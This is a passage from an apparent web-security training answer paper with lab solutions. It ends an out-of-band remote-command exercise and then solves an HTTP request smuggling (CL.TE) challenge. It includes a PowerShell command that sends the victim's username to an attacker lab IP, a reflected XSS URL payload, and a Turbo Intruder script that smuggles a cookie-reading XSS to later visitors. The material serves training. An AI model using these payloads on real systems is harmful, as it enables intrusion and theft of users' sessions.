Validation key, the decryption key will be from step 4 and command is 'Remote command' that will
be executed as shown in the figure:

powershell.exe Invoke-WebRequest -Uri http://192.168.4.X:8000/$env:UserName

Page: | 59

©
Claranet Cyber Security 2021. All rights reserved

Technet24
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Step 9: Copy the generated payload from above step and replace it in request captured in step 6 as
shown in the figure:

Step 10: Convert the pasted payload in 'URL-encode key characters' as shown in the figure:

Page: | 60

©
Claranet Cyber Security 2021. All rights reserved
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Step 11: Forward request to the server and note that the server responds with '500 Internal Server
Error' as shown in the figure:

Step 12: Payload is successfully executed on the server and OOB call is received as shown in the
figure:

Page: | 61

©
Claranet Cyber Security 2021. All rights reserved

Technet24
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

HTTP Desync Attacks

Challenge URL: http://covid19.webhacklab.com:5000

• Discover the Cross-Site Scripting vulnerability.

• Perform HTTP Desync Attack to get the Cross-Site Script executed when a new user
visits.

Solution:
Step 1: Access the application via ‘http://covid19.webhacklab.com:5000’ and try to identify any
Cross-Site Scripting vulnerability:

Page: | 62

©
Claranet Cyber Security 2021. All rights reserved
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Step 2: During Reconnaissance, a web page which is vulnerable to Reflected Cross-Site Scripting
attack will be discovered. Figure shows that the application executed malicious JavaScript when the
URL
http://covid19.webhacklab.com:5000/hello/world%22%3E%3Cimg%20src=a%20onerror=alert(docu
ment.location)%3E was accessed:

Affected Parameter - REST based Name

Page: | 63

©
Claranet Cyber Security 2021. All rights reserved

Technet24
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Step 3: Figure below shows HTTP Request and Response captured for Home page

Note: You can capture request of any page from the application:

Page: | 64

©
Claranet Cyber Security 2021. All rights reserved
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Step 4: Right click on the Request section in Burp Repeater and click on ‘Change request method’
to change the request from GET to POST:

Page: | 65

©
Claranet Cyber Security 2021. All rights reserved

Technet24
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Step 5: Right click on the Request section in Burp Repeater and click on ‘Convert to chunked’ to
convert the HTTP Request to chunked, so that a Request header ‘Transfer-Encoding: chunked’ gets
added:

Page: | 66

©
Claranet Cyber Security 2021. All rights reserved
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Step 6: Right click on the Request section in Burp Repeater and click on ‘Smuggle attack (CL.TE)’
to send the request to perform Request Smuggling attack, Content Length - Transfer Encoding:

Page: | 67

©
Claranet Cyber Security 2021. All rights reserved

Technet24
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Step 7: As soon as you click on ‘Smuggle Attack CL.TE’ a Smuggler extension will load. Copy the
below mentioned script and paste it to Request Smuggler Burp Extension which will perform the
Request Smuggling attack - CL.TE. Screenshot is attached below for reference and understanding:

Note: Follow these steps and replace the “Transfer-Encoding: chunked” in the box below:

def queueRequests(target, wordlists):

engine = RequestEngine(endpoint='http://covid19.webhacklab.com:5000',
concurrentConnections=1,
requestsPerConnection=1,
pipeline=False,
maxRetriesPerRequest=0
)

attack = '''POST / HTTP/1.1

Host: covid19.webhacklab.com:5000
Content-Length: 37
Connection: keep-alive
Transfer-Encoding: chunked

1
A
0

GET /hello/world<img%20src=a%20onerror=alert(document.cookie)> HTTP/1.1

X-Foo: bar'''
engine.queue(attack)

Page: | 68

©
Claranet Cyber Security 2021. All rights reserved
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

engine.start()

def handleResponse(req, interesting):

table.add(req)
if req.code == 200:
victim = '''GET / HTTP/1.1
Host: covid19.webhacklab.com:5000
Connection: close

'''

for i in range(10):
req.engine.queue(victim)

Page: | 69

©
Claranet Cyber Security 2021. All rights reserved

Technet24
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Step 8: Analyze HTTP Request and Response in Turbo Intruder:

Page: | 70

©
Claranet Cyber Security 2021. All rights reserved
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Step 9: Once the Turbo Intruder is in the ‘Attack Mode’, CL.TE requests are sent simultaneously to
the application. When any user visits the application the payload will execute resulting into Cross-
Site Scripting as per our payload from Step 7:

Page: | 71

©
Claranet Cyber Security 2021. All rights reserved

Technet24
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Step 10: This ‘Attack’ will only serve the payload request once:

END OF PART - 4

Page: | 72

©
Claranet Cyber Security 2021. All rights reserved